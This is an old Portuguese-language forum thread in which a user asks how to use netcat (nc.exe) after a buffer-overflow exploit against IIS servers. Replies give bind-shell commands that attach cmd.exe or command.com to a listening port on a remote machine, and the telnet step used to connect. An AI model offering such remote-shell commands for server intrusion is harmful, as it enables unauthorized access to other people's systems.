Exibindo resultados 1 até 6 de 6

Tópico: NC.EXE

Desde
    Aug 2002
    Peso da Avaliação
    0
    aí galera alguem sabe como funciona esse programa..???? ele serve pra vc invadir servido IIS com buffer overflow vc só tem q executar o exploit em perl e executar o programa nc.exe... mas tipo assim tem que digitar alguns comandos e eu naum entendo nada.... me deem uma luz !!!!!

valeu...

Desde
    Jul 2002
    Local
    Teresópolis, RJ
    Peso da Avaliação
    11
    Bem, pelo que parece, esse nc.exe aí é o netcat pra windows..
    Download e informações vc encontra aqui. Bem, o netcat é chamado de "canivete suíço".. vc vai ver pq:
    Não sei qual é o esquema nesse caso, mas vc tanto pode acessar um servidor remoto quanto usar o nc como servidor...
    nc xxx.xxx.xxx.xxx 23
    Acessa a porta 23 (telnet)
    nc -l -p 53 -t -e cmd.exe
    Esse aí deve ser rodado no computador remoto.. faz com que o nc escute conexões (-l) na porta 53 (-p 53) e execute o cmd.exe, dando um interpretador de  comandos para vc..
    O que ele ta fazendo nesse caso é redirecionar a saída e a entrada (stdin e stdout se preferir assim) do cmd.exe para a rede. Vc conecta ao netcat pela porta 53 nesse caso, ele direciona seus comandos para o cmd.exe, que os executa;
    a saída que ele te daria se vc estivesse lá, o nc passa pra vc.
    E vc pode usar tb para acessar qq porta..

nc host.alvo.dominio 80 < arquivo
    Esse exemplo manda o conteudo de arquivo para a porta 80 do servidor alvo.
    Bem, vai lá.. leia os manuais, aproveite pra dar uma olhada nas ferramentas forenses, e divirta-se. Hmm. Não faça besteira..

Desde
    Sep 2002
    Peso da Avaliação
    0

Arrow

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Citação </td></tr><tr><td id="QUOTE">Não sei qual é o esquema nesse caso, mas vc tanto pode acessar um servidor remoto quanto usar o nc como servidor...
    nc xxx.xxx.xxx.xxx 23
    Acessa a porta 23 (telnet)
    nc -l -p 53 -t -e cmd.exe
    Esse aí deve ser rodado no computador remoto.. faz com que o nc escute conexões (-l) na porta 53 (-p 53) e execute o cmd.exe, dando um interpretador de &nbsp;comandos para vc..
    O que ele ta fazendo nesse caso é redirecionar a saída e a entrada (stdin e stdout se preferir assim) do cmd.exe para a rede. Vc conecta ao netcat pela porta 53 nesse caso, ele direciona seus comandos para o cmd.exe, que os executa;
    a saída que ele te daria se vc estivesse lá, o nc passa pra vc.
    E vc pode usar tb para acessar qq porta..[/QUOTE]<span id='postcolor'>
    1. O &quot;cmd.exe&quot; é um interpretador de comandos que só é usado remotamente ou ele é um terminal qualquer, assim como o command.com?
    2. Eu poderia atuar com o command.com ao invéz dele? Exemplo:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">nc -l -p 53 -t -e command.com[/QUOTE]<span id='postcolor'>

Obrigado pela atenção&#33;
    []&#39;s... LiPSuRFeR
    lipsurfer@hotmail.com

Desde
    Sep 2002
    Peso da Avaliação
    0
    Respondendo minhas próprias dúvidas (isso não te comove?):

1. O cmd.exe é um terminal qualquer, assim como o command.com, e os dois podem ser utilizados para administração remota.
    2. Sim, se o sistema que utilizo tem a base Win9x (quanto às versões posteriores eu não sei muito bem, pois só utilizei o Win95, Win98 e Win98SE) posso utilizar o command.com ao invés do cmd.exe com a linha de comando:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">nc -l -p 666 -vv -e command.com[/QUOTE]<span id='postcolor'>
    Assim a pessoa que quer acessar meus arquivos remotamente vai em &quot;INICIAR&quot;, &quot;EXECUTAR&quot;, e digita:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Código exemplo </td></tr><tr><td id="CODE">telnet 200.154.15.147 666[/QUOTE]<span id='postcolor'>
    Assim receberá um terminal idêntico ao command.com, porém remotamente.
    Altere a porta 666 pela porta que deseja servir, e IP 200.154.15.147 pelo seu IP. Cuidado com o que fará com isso, pois estará dando permissão root ao usuário que conectar a você.

[]&#39;s... LiPSuRFeR
    lipsurfer@hotmail.com

Desde
    Sep 2002
    Peso da Avaliação
    0

Question

Ola pessoal

como faço pra fechar uma porta , depois q abri com o netcat???

Desde
    Sep 2002
    Peso da Avaliação
    0

Arrow

Basta fechar o NetCat.

[]&#39;s... LiPSuRFeR
    lipsurfer@hotmail.com

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Regras de envio